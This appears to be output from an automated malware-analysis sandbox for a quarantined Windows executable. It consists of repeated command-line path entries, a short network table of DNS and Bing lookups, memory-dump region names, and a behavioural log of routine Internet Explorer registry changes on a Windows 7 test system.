"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
Files
memory/1232-0-0x0000000074BBE000-0x0000000074BBF000-memory.dmp
memory/1232-1-0x0000000000E80000-0x0000000000FF0000-memory.dmp
memory/1232-2-0x0000000005EF0000-0x0000000006494000-memory.dmp
memory/1232-4-0x0000000074BB0000-0x0000000075360000-memory.dmp
memory/1232-5-0x0000000074BBE000-0x0000000074BBF000-memory.dmp
memory/1232-6-0x0000000074BB0000-0x0000000075360000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win7-20240903-en
Max time kernel
147s
Max time network
129s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000007b7b733f7c253b4c826af622749b40c000000000020000000000106600000001000020000000a78f6e4e79be73bda68dc7a0bbbcab2ae9696091a31f40e6d3ec48b844ad70d3000000000e80000000020000200000009358b463a3da7decaa0a7a2fbfe5d5ab6bd2471ee8b6c62a004a45b25ca8228920000000c82b6691e211b6a4b915da5ae8e8e60eb23ec28b6ebb40da7becf503f6b9d2cb4000000095b867fe2143d00788da289e874e39bd640ff0ead930e7b83f57f73352a35d6cadd15e8ff45f29adfeceac3c8ec41a3aefc34c450be7f820a53ba63cf5c7d85e | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{46A542C1-F499-11EF-8250-E62D5E492327} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "446774343" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000007b7b733f7c253b4c826af622749b40c0000000000200000000001066000000010000200000006e0a8e871a77bd04d21e25d95d11d5404b724dfed7a6fcacf4d952fe8d2768eb000000000e8000000002000020000000dc2ee39a8dddc03233169836f0bd67a4958d9b9034051ac722c40562a68653ca90000000d8adefab98fc6f65aedadd831c7445ea3de01278412c6c94a90ff84de03dccc80c1fc87cea7f530d7de7a0cba178b38979b010700bcea374a023ddfc41ab8f1f56150417a9b28daef9ea58640ae8a7678293ab897f5ca7f34c5e6a43ff5bcec8146117ad97b661b32fce959eee805cc03679d74cceb575568fda1e1866d8fba3c7ab9987eca6631219b9094a5d1fe17d40000000314ce11158bb91a8e99445e560e1476e99fe343fd97c5cc6b41e13ff38b8e575e718a37f31e3a377077d27c6984e11ee2a7a216325ca844cec53c55686e8014c | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
